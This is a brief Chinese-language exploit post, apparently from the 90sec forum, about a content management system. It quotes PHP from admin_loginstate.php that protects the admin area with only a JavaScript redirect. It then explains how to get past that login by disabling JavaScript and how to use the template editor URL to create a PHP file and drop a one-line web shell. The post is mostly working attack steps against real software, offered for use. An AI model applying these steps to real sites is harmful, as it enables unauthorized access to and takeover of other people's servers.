作者:z2681
From:90sec
漏洞文件 admin 目录下的admin_loginstate.
php看代码
if(empty($_COOKIE['S_AdminID'])){
echo "<script>window.location='admin_login.
php'</script>";
exit;
}
elseif($_COOKIE['S_Login']!=md5($_COOKIE['S_AdminID'].$_COOKIE['S_AdminUserName'].$_COOKIE['S_AdminPass
word'].$_COOKIE['S_Permission'])){
echo "<script>window.parent.location='admin_login.
php'</script>";
}
?>
很简单的看出来是cookie验证 我们直接禁止JS可直接进后台
进后台后简单的说下拿shell的方法
/admin/admin_template.
php?action=templist;path=../skins/index/html/;tempname=默认模版;file=qingshen.
php90
直接访问这个url 然后写个一句话就可以了 目录当然是在/skins/index/html/ 目录下的
